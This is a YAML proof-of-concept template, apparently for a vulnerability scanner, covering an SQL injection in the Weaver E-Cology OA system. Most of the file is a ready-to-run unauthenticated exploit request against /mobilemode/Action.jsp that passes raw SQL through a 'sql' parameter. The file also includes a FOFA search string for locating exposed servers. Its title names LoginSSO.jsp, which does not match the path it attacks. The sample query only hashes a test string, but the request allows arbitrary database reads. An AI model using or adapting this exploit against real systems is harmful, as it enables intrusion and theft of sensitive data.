product: 泛微E-Cology
vName: 泛微E-Cology LoginSSO.jsp SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: https://cn-sec.com/archives/3019368.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /mobilemode/Action.jsp?invoker=com.weaver.formmodel.mobile.mec.servlet.MECAdminAction&action=getDatasBySQL&datasource=&sql=select sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456'))&noLogin=1
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: 'and'